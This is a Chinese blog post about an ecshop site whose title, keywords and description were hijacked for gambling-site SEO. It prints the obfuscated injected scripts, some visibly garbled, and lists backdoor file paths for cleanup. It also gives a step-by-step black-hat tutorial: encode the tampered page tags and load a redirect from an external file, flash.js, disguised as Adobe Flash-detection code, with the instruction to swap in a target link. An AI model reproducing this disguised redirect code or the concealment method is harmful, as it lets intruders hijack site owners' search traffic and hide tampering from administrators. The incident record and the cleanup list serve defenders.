记录一个木马:ecshop TDK被篡改为博彩站/劫持快照/ 劫持全站 自动跳转 黑帽seo技术-木木资源博

来源: 记录一个木马:ecshop TDK被篡改为博彩站/劫持快照/ 劫持全站 自动跳转 黑帽seo技术-木木资源博

不得不说,网站安全防护这块博主很鸡肋,此前在网络公司做一些小的企业站也遇到过大大小小的网站安全问题,找到问题根源删除,打打网站补丁一般问题不大,解决的也很顺利;但是这次貌似真的是遇到硬茬了

在中木马前博主做了哪些防护?

启用云加速DNS,隐藏网站真实IP;

修改宝塔linux面板默认端口,账号密码,隐藏端口;

修改网站后台路径,默认账号;

ecshop隔段时间打打补丁(已被黑客高调删除)…….

本博主要为被中招的同学提供点建议和思路,其中包含进攻和反进攻的具体方法,请勿非法使用,使用了别说在本博上学到的,博主不背这个锅!

 

1、木马表现:

1、网站TDK被篡改为博彩站标题,关键词,描述;

2、网站快照被劫持

3、部分源码丢失

 

2、实例说明:

title(标题),keywords(关键词)与description(描述)都被进行编码的

被篡改后的TDK 和 加密js代码

 

3、被编码后篡改TDK:

为了防止所加的内容被管理员发现清除,为了劫持的稳定性,title(标题),keywords(关键词)与description(描述)都进行了编码,标题后面一段加密js代码:

<script>if(if(navigator.userAgent.toLocaleLowerowerCase().indexOf("baidu") == -1){1){document.title ="幼 ="幼儿园家具_幼儿园桌椅批发_儿童小床_XXXXXXX有限公司"}</script>  
 <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?35?String.fromCharCode(ode(c+29):9):c.toString(36)(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=)p=p.replace(new(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\e\\c\\1\\l\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\\2\\1\\4\\9\\3\\0\\h\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76'.split('|'),0,{}))  
 </script>  

感兴趣的同学可以进行解密一下

4、还有一种非编码篡改TDK:

非编码篡改的网站标题,描述

 

后来博主了解到这种编码是Unicode,Unicode在线转换:http://tool.oschina.net/encode 。但是在快照投诉,快照更新没有不编码更新的快。


博主顺道检查了一下手机端,发现手机端自动跳转到博彩站,并返现以下代码:

<script LANGUAGE=\"Javascript\">
var s=document.referrer
if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )
location.href=\"https://www.liulinblog.com\";
</script>

这段代码的作用是判断来路,如果是从搜索引擎进的本站,会自动跳转到指定链接。

 

会造成什么SEO后果?

 

5、快照劫持

快照劫持是指在快照投诉以后,快照更新成功。目标网站上了自己指定的标题,关键词与描述,就算管理员已经发现网站被加入了这些代码,删除之后,从百度进入依然会跳转到指定站,这保证了劫持了稳定性。

网站挂马事隔两天后,当我们去看网站源代码时候,已经没有留下任何黑帽SEO代码,危险代码均被删除,但从百度访问依旧会跳转到目标站点。从而保证了流量进入目标站点的稳定性,这个就是快照劫持。

如何解决?

快照投诉 http://tousu.baidu.com/webmaster/add

6、全站劫持

所谓的全站劫持,就是让目标站点所有文章都加入黑帽SEO代码,这个要靠经验,笔者曾经在一个朋友曾经开的Discuz站被全站劫持过,site之后所有内容都是菠菜相关的,笔者发现source/class/class_core.php中被加入黑帽SEO代码,而所有文章查看源代码均发现有黑帽seo代码,这个class_core.php文件控制全站的头部,所以整站被劫持了。黑帽seo主要靠经验,方法都是死的。

7、完整的黑帽SEO流程

博主推导出过程后,开始尝试,首先为了隐藏,选择从外部引入js代码,因为在导入js文件到某个文件夹的时候,文件夹会显示最近更新时间,会被管理员发现。可以随便选择一个稳定的空间做外链,例如阿里云Eos,七牛云等等。

在站点head标题中插入以下黑帽seo引擎劫持代码

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="目标站的标题"}</script>  //目标站原本的标题,直接输入网址进入网站标题才不会变,也是为了隐藏
<title>你要做的标题</title>
<meta name="keywords" content="你要做的词"/>
<meta name="description" content="你要做的描述"/>
<script language="javascript" type="text/javascript" src="/这边是你的跳转代码/flash.js" ></script>  //SEO跳转代码

为了防止被管理员发现,标题,关键词与描述最好用Unicode编码一下,Unicode在线转换:http://tool.oschina.net/encode  关键词之间用逗号隔开。

博主为了更好的隐藏,对跳转代码进行了加工,命名为flash.js

<!--
//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2008 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
	var axo;
	var e;
	// NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry
	try {
		// version will be set for 7.X or greater players
		axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
		version = axo.GetVariable("$version");
	} catch (e) {
	}
	if (!version)
	{
		try {
			// version will be set for 6.X players only
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
			
			// installed player is some revision of 6.0
			// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
			// so we have to be careful. 
			
			// default to the first public version
			version = "WIN 6,0,21,0";
			// throws if AllowScripAccess does not exist (introduced in 6.0r47)		
			axo.AllowScriptAccess = "always";
			// safe to call for 6.0r47 or greater
			version = axo.GetVariable("$version");
		} catch (e) {
		}
	}
	if (!version)
	{
		try {
			// version will be set for 4.X or 5.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = axo.GetVariable("$version");
		} catch (e) {
		}
	}
	if (!version)
	{
		try {
			// version will be set for 3.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
			version = "WIN 3,0,18,0";
		} catch (e) {
		}
	}
	if (!version)
	{
		try {
			// version will be set for 2.X player
			axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
			version = "WIN 2,0,0,11";
		} catch (e) {
			version = -1;
		}
	}
	
	return version;
}
// JavaScript helper required to detect Flash Player PlugIn version information
function GetSwfVer(){
	// NS/Opera version >= 3 check for Flash plugin in plugin array
	var flashVer = -1;
	
	if (navigator.plugins != null && navigator.plugins.length > 0) {
		if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
			var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
			var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
			var descArray = flashDescription.split(" ");
			var tempArrayMajor = descArray[2].split(".");			
			var versionMajor = tempArrayMajor[0];
			var versionMinor = tempArrayMajor[1];
			var versionRevision = descArray[3];
			if (versionRevision == "") {
				versionRevision = descArray[4];
			}
			if (versionRevision[0] == "d") {
				versionRevision = versionRevision.substring(1);
			} else if (versionRevision[0] == "r") {
				versionRevision = versionRevision.substring(1);
				if (versionRevision.indexOf("d") > 0) {
					versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
				}
			}
			var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
		}
	}
	// MSN/WebTV 2.6 supports Flash 4
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
	// WebTV 2.5 supports Flash 3
	else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
	// older WebTV supports Flash 2
	else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
	else if ( isIE && isWin && !isOpera ) {
		flashVer = ControlVersion();
	}	
	return flashVer;
}
// When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision)
{
	versionStr = GetSwfVer();
	if (versionStr == -1 ) {
		return false;
	} else if (versionStr != 0) {
		if(isIE && isWin && !isOpera) {
			// Given "WIN 2,0,0,11"
			tempArray         = versionStr.split(" "); 	// ["WIN", "2,0,0,11"]
			tempString        = tempArray[1];			// "2,0,0,11"
			versionArray      = tempString.split(",");	// ['2', '0', '0', '11']
		} else {
			versionArray      = versionStr.split(".");
		}
		var versionMajor      = versionArray[0];
		var versionMinor      = versionArray[1];
		var versionRevision   = versionArray[2];
        	// is the major.revision >= requested major.revision AND the minor version >= requested minor
		if (versionMajor > parseFloat(reqMajorVer)) {
			return true;
		} else if (versionMajor == parseFloat(reqMajorVer)) {
			if (versionMinor > parseFloat(reqMinorVer))
				return true;
			else if (versionMinor == parseFloat(reqMinorVer)) {
				if (versionRevision >= parseFloat(reqRevision))
					return true;
			}
		}
		return false;
	}
}
function AC_AddExtension(src, ext)
{
  if (src.indexOf('?') != -1)
    return src.replace(/\?/, ext+'?'); 
  else
    return src + ext;
}
function AC_Generateobj(objAttrs, params, embedAttrs) 
{ 
  var str = '';
  if (isIE && isWin && !isOpera)
  {
    str += '<object '; for (var i in objAttrs) { str += i + '="' + objAttrs[i] + '" '; } str += '>';    for (var i in params)    {      str += ' ';    }    str += '';
  }
  else
  {
    str += '<embed '; for (var i in embedAttrs) { str += i + '="' + embedAttrs[i] + '" '; } str += '> ';
  }
  document.write(str);
}
function AC_FL_RunContent(){
  var ret = 
    AC_GetArgs
    (  arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
     , "application/x-shockwave-flash"
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_SW_RunContent(){
  var ret = 
    AC_GetArgs
    (  arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000"
     , null
    );
  AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
}
function AC_GetArgs(args, ext, srcParamName, classid, mimeType){
  var ret = new Object();
  ret.embedAttrs = new Object();
  ret.params = new Object();
  ret.objAttrs = new Object();
  for (var i=0; i < args.length; i=i+2){
    var currArg = args[i].toLowerCase();    
    switch (currArg){	
      case "classid":
        break;
      case "pluginspage":
        ret.embedAttrs[args[i]] = args[i+1];
        break;
      case "src":
      case "movie":	
        args[i+1] = AC_AddExtension(args[i+1], ext);
        ret.embedAttrs["src"] = args[i+1];
        ret.params[srcParamName] = args[i+1];
        break;
      case "onafterupdate":
      case "onbeforeupdate":
      case "onblur":
      case "oncellchange":
      case "onclick":
      case "ondblclick":
      case "ondrag":
      case "ondragend":
      case "ondragenter":
      case "ondragleave":
      case "ondragover":
      case "ondrop":
      case "onfinish":
      case "onfocus":
      case "onhelp":
      case "onmousedown":
      case "onmouseup":
      case "onmouseover":
      case "onmousemove":
      case "onmouseout":
      case "onkeypress":
      case "onkeydown":
      case "onkeyup":
      case "onload":
      case "onlosecapture":
      case "onpropertychange":
      case "onreadystatechange":
      case "onrowsdelete":
      case "onrowenter":
      case "onrowexit":
      case "onrowsinserted":
      case "onstart":
      case "onscroll":
      case "onbeforeeditfocus":
      case "onactivate":
      case "onbeforedeactivate":
      case "ondeactivate":
      case "type":
      case "codebase":
      case "id":
        ret.objAttrs[args[i]] = args[i+1];
        break;
      case "width":
      case "height":
      case "align":
      case "vspace": 
      case "hspace":
      case "class":
      case "title":
      case "accesskey":
      case "name":
      case "tabindex":
        ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1];
        break;
      default:
        ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1];
    }
  }
  ret.objAttrs["classid"] = classid;
  if (mimeType) ret.embedAttrs["type"] = mimeType;
  return ret;
}
// --> var ref=document.referrer;
var baidu=ref.indexOf("baidu");
var soso=ref.indexOf("soso");
var google=ref.indexOf("google");
var sogou=ref.indexOf("sogou");
var s360=ref.indexOf("360.cn");
var s3602=ref.indexOf("so.com");
var sbing=ref.indexOf("bing.cn");
if(baidu!=-1 || soso!=-1 || google!=-1 || sogou!=-1 || s360!=-1 || s3602!=-1 || sbing!=-1){

 this_url = 'https://www.liulinblog.com';
  window.top.location.replace(this_url);
  window.location.href=this_url;
} 

前面的很长一大段人畜无害的代码没有任何卵用,只要用来混淆视线。最后的几段才是seo代码。把链接改成要跳转的站就行。

接着提交百度快照投诉,百度快照投诉入口进行快照投诉:http://tousu.baidu.com/webmaster/add

随后就是耐心的等待。

如何根除和清理此类木马?

我们先分析一下黑客行为:

标题,关键词,描述被Unicode编码更容易隐藏,但是快照投诉后更新会很慢。

跳转代码不直接写在一个页面里,也不导入到站点文件夹(文件夹最近更新时间会泄露你的文件位置)。跳转代码的js文件外联引用>>>>不容易被发现

site一下自己的网站,看看是否被全站劫持


好吧,我们来解决一下这个站(https://www.sdhoupu.com)的木马问题,博主是用的一套 ecshop小京东源码,二次开发的一个站点,经博主连夜分析结果如下:

ECSHOP 小京东源码后门文件

 

/supplier/includes/exchange.php

 

ecshop小京东后门文件(一)

/mobile/lequ.php

ecshop小京东后门文件(二)

/mobile/lian.php

ecshop小京东后门文件

/mobile/cm.php

ecshop小京东后门文件(4)

/mobile/admin/images/charts/comon.php

ecshop小京东后门文件(5)

/js/calendar/calendar.php

ecshop小京东后门文件(6)

/errpage/css/style.php

ecshop小京东后门文件(8)

/app/includes/modules/payment/key/public_key.php

ecshop小京东后门文件(9)

/admin_sdhoupu/alipay.php

ecshop小京东后门文件

/ueditor/php/upload/image/20171118/1510983269553259.php

ecshop小京东后门文件

/lian.php

ecshop小京东后门文件

/languages/zh_cn/calendar.php

ecshop小京东后门文件

 

 


以上为总结和检测出来的后门文件,删除清理即可!

删除清理后,迅速为网站打补丁《ecshop中毒怎么办?以下补丁你打了吗?关于ecshop中sql注入漏洞修复》,网站安全无小事,否则可能造成你前期一起工作前功尽弃

服务器内部您可以参考西部数码:http://faq.myhostadmin.net/faq/listagent.asp?unid=2093 安装云锁进行防护

先这么着把!回家睡觉了….

赞(0) 打赏
分享到: 更多 (0)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏